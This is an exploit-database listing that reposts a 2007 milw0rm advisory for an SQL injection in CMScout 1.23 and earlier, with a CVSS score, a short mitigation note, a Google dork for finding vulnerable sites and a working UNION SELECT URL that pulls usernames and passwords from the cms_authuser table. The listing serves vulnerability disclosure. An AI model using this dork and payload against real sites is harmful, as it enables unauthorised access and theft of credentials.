header-logo
Suggest Exploit
vendor:
CMScout
by:
FiSh
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CMScout
Affected Version From: <= 1.23
Affected Version To: <= 1.23
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

CMScout <= 1.23 SQL Injection

The CMScout <= 1.23 script is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting malicious SQL queries into the 'page' parameter of the index.php file. This allows the attacker to retrieve sensitive information from the database, such as usernames and passwords.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of CMScout or implement input validation and parameterized queries to prevent SQL Injection attacks.
Source

Exploit-DB raw data:

###############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
###############################################################################################
#Program Title ################################################################################
#CMScout <= 1.23 SQL Injection
#
#Script Download ##############################################################################
#http://www.cmscout.za.net/index.php?page=downloads&id=45&action=down&catid=1
#
#d0rk #########################################################################################
#"Powered by CMScout"
#
#Spl0it #######################################################################################
#http://[ site ]/index.php?page=forums&f=1/**/union/**/all/**/select/**/0,uname,passwd,2,3,4,5,6,7,8/**/from/**/cms_authuser/*
#
#vuln discovered by ###########################################################################
#FiSh
#
#shoutz: MurderSkillz, z3r0, milf, godXcel, clorox, katalyst, SyNiCaL, OD, pr0be, str0ke,
#sCuZz, canuck, Vipsta, c0ma, grumpy, SiCk, trintitty, 13337.org, a59, fury,
#<S>, Bernard, and everyone else at g00ns.net
###############################################################################################

# milw0rm.com [2007-07-14]

Navigation

Suggest Exploit

Services By CQR